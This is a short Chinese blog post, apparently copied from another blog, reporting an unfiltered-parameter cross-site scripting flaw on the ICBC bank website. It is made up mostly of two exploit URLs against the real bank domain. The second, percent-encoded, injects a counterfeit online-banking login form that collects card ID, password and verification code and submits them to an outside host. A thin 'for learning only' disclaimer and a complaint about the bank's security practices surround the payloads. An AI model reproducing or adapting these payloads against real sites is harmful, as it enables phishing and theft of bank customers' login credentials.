工行官方站點出現嚴重漏洞

 偶然間發現一篇文章介紹到工行的官方站點竟然有漏洞，本文代碼均摘自http://www.phpobject.net/blog/read.php?82  主要的問題是跨域問題（XSS）還有就是對參數沒有設置過濾，一個金融系統的網站盡然有如此問題有點讓我害怕。

漏洞測試代碼：

http://www.icbc.com.cn/click/adver/adver.jsp?para=javascript:test()";function%20test(){document.write('%B9%A4%D0%D0%BD%F4%BC%B1%CD%A8%D6%AA%A3%BA%B9%A4%D0%D0%D0%C2%CE%C5%CF%B5%CD%B3%B3%F6%CF%D6%D1%CF%D6%D8%C2%A9%B6%B4%A3%AC%D0%A1%D0%C4%B1%BB%C6%AD')}

還有一個更強的：

http://www.icbc.com.cn/click/adver/adver.jsp?para=%6A%61%76%61%73%63%72%69%70%74%3A%73%28%29%3B%66%75%6E%63%74%69%6F%6E%20%73%28%29%7B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%3C%74%69%74%6C%65%3E%D6%D0%B9%FA%B9%A4%C9%CC%D2%F8%D0%D0%D0%C2%D2%BB%B4%FA%CD%F8%C9%CF%D2%F8%D0%D0%3C%2F%74%69%74%6C%65%3E%3C%64%69%76%20%61%6C%69%67%6E%253Dcenter%3E%3Cform%20name%253Df%20action%253Dhttp%3A%2F%2Fwww%2E126%2Ecom%3E%3Ctable%20border%253D0%20width%253D400%3E%3Ctr%3E%3Ctd%20colspan%253D2%3E%3Cp%20align%253Dcenter%3E%3Cb%3E%3Cfont%20color%253D%2523FF0000%3E%B8%F6%C8%CB%CD%F8%C9%CF%D2%F8%D0%D0%D3%C3%BB%A7%B5%C7%C2%BC%3C%2Ffont%3E%3C%2Fb%3E%3Cp%20align%253Dcenter%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3E%C7%EB%CA%E4%C8%EB%D7%A2%B2%E1%BF%A8%2F%B5%C7%C2%BCID%A3%BA%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%253Dtext%20name%253Da%20size%253D19%20maxlength%253D19%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3E%C7%EB%CA%E4%C8%EB%B5%C7%C2%BC%C3%DC%C2%EB%A3%BA%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%253Dpassword%20name%253Db%20size%253D20%20maxlength%253D20%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3E%C7%EB%CA%E4%C8%EB%D3%D2%B2%E0%CF%D4%CA%BE%B5%C4%D1%E9%D6%A4%C2%EB%A3%BA%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%253Dpassword%20name%253Dc%20size%253D4%20maxlength%253D4%3E%2526nbsp%3B%3Cimg%20src%253Dhttps%3A%2F%2Fmybank%2Eicbc%2Ecom%2Ecn%2Ficbc%2Fperbank%2Fverifyimage%2Ejsp%3FrandomKey%253D1167791351382113206%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%20colspan%253D2%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%20colspan%253D2%3E%3Cp%20align%253Dcenter%3E%3Ca%20href%253Djavascript%3Adocument%2Ef%2Esubmit%28%29%3E%3Cimg%20src%253Dhttps%3A%2F%2Fmybank%2Eicbc%2Ecom%2Ecn%2Ficbc%2Fperbank%2Fimages%2Fagree%2Egif%20border%253D0%3E%3C%2Fa%3E%2526nbsp%3B%2526nbsp%3B%2526nbsp%3B%3Ca%20href%253Djavascript%3Adocument%2Ef%2Esubmit%28%29%3E%3Cimg%20src%253Dhttps%3A%2F%2Fmybank%2Eicbc%2Ecom%2Ecn%2Ficbc%2Fperbank%2Fimages%2Fdisagree%2Egif%20border%253D0%3E%3C%2Fa%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3C%2Fform%3E%3C%2Fdiv%3E%27%29%29%7D%2F%2F

以上代碼均具有一定破壞性，只在學習提高網絡安全意識。慎用，非法用途後果自負！！

其實這些都是小問題，在很多project中我們自己也會範這樣的小問題，但問題就在於他是工商銀行一個金融系統，真不知道他們的程序設計人員怎麼考慮的，工作中沒有質量安全控制嗎？真危險！